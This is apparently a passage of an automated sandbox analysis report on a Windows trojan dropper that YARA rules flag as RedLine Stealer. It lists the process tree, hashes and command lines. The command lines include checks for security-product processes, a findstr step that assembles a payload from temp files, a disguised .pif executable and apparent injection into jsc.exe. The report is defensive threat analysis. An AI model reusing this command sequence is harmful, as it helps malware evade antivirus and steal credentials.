                                                                                                                                                                                              Mar 9, 2025 07:24:14.048974991 CET5813253192.168.2.41.1.1.1
                                                                                                                                                                                              Mar 9, 2025 07:24:14.057312012 CET53581321.1.1.1192.168.2.4
                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                              Mar 9, 2025 07:24:14.048974991 CET192.168.2.41.1.1.10x1cdbStandard query (0)xCYuqFZpbOjjkUqkfthcb.xCYuqFZpbOjjkUqkfthcbA (IP address)IN (0x0001)false
                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                              Mar 9, 2025 07:24:14.057312012 CET1.1.1.1192.168.2.40x1cdbName error (3)xCYuqFZpbOjjkUqkfthcb.xCYuqFZpbOjjkUqkfthcbnonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                              Start time:01:24:11
                                                                                                                                                                                              Start date:09/03/2025
                                                                                                                                                                                              Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe"
                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                              File size:1'019'448 bytes
                                                                                                                                                                                              MD5 hash:AF3DF67046ABB1A4BD2600009FB51F19
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                              Start time:01:24:11
                                                                                                                                                                                              Start date:09/03/2025
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                                                                                                              Imagebase:0xbd0000
                                                                                                                                                                                              File size:46'504 bytes
                                                                                                                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                              Start time:01:24:11
                                                                                                                                                                                              Start date:09/03/2025
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c cmd < Bel.tmp
                                                                                                                                                                                              Imagebase:0xc70000
                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                              Start time:01:24:11
                                                                                                                                                                                              Start date:09/03/2025
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff62fc20000
                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                              Start time:01:24:12
                                                                                                                                                                                              Start date:09/03/2025
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:cmd
                                                                                                                                                                                              Imagebase:0xc70000
                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                              Start time:01:24:12
                                                                                                                                                                                              Start date:09/03/2025
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:tasklist /FI "imagename eq BullGuardCore.exe"
                                                                                                                                                                                              Imagebase:0x150000
                                                                                                                                                                                              File size:79'360 bytes
                                                                                                                                                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                              Start time:01:24:12
                                                                                                                                                                                              Start date:09/03/2025
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\find.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:find /I /N "bullguardcore.exe"
                                                                                                                                                                                              Imagebase:0xbf0000
                                                                                                                                                                                              File size:14'848 bytes
                                                                                                                                                                                              MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                              Start time:01:24:12
                                                                                                                                                                                              Start date:09/03/2025
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:tasklist /FI "imagename eq PSUAService.exe"
                                                                                                                                                                                              Imagebase:0x150000
                                                                                                                                                                                              File size:79'360 bytes
                                                                                                                                                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                              Start time:01:24:12
                                                                                                                                                                                              Start date:09/03/2025
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\find.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:find /I /N "psuaservice.exe"
                                                                                                                                                                                              Imagebase:0xbf0000
                                                                                                                                                                                              File size:14'848 bytes
                                                                                                                                                                                              MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                              Start time:01:24:12
                                                                                                                                                                                              Start date:09/03/2025
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:findstr /V /R "^BMFIocnwPbapedepYbhWqofGZurIuQVJxjUhlGSmSVBHSStsfyboyoBzbYJwaQVYCIOPvPZsEOttGIOueLaqzNEjKBPjXRuwqCtptgVmuyDdrvMPlCYGbU$" Dici.tmp
                                                                                                                                                                                              Imagebase:0xf70000
                                                                                                                                                                                              File size:29'696 bytes
                                                                                                                                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                              Start time:01:24:12
                                                                                                                                                                                              Start date:09/03/2025
                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:Rarissima.exe.pif u
                                                                                                                                                                                              Imagebase:0x950000
                                                                                                                                                                                              File size:893'608 bytes
                                                                                                                                                                                              MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000003.1743982842.0000000003E18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 0000000A.00000003.1743982842.0000000003E18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000003.1743078453.0000000003EAB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 0000000A.00000003.1743078453.0000000003EAB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000003.1743286969.0000000003E38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 0000000A.00000003.1743286969.0000000003E38000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000003.1680425989.00000000050F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 0000000A.00000003.1680425989.00000000050F0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000003.1744137942.0000000003DF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 0000000A.00000003.1744137942.0000000003DF0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                              • Detection: 3%, ReversingLabs
                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                              Start time:01:24:12
                                                                                                                                                                                              Start date:09/03/2025
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\waitfor.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:waitfor /t 5 cPJmppTIOgHphOgIZlJIVQpIXRsFPuungjFRADw
                                                                                                                                                                                              Imagebase:0x440000
                                                                                                                                                                                              File size:32'768 bytes
                                                                                                                                                                                              MD5 hash:E58E152B44F20DD099C5105DE482DF24
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                              Start time:01:25:03
                                                                                                                                                                                              Start date:09/03/2025
                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                                                                                                                              Imagebase:0xb10000
                                                                                                                                                                                              File size:47'584 bytes
                                                                                                                                                                                              MD5 hash:94C8E57A80DFCA2482DEDB87B93D4FD9
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000013.00000002.2411191854.0000000000BE2000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 00000013.00000002.2411191854.0000000000BE2000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                              Reset < >